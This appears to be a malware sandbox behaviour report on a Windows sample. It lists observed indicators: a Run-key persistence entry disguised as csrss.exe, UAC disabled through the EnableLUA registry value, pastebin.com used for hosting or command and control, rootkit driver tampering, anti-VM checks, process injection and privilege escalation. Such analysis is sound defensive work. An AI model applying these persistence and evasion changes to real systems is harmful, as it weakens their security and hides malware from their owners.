Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2272 set thread context of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u318.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u318.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
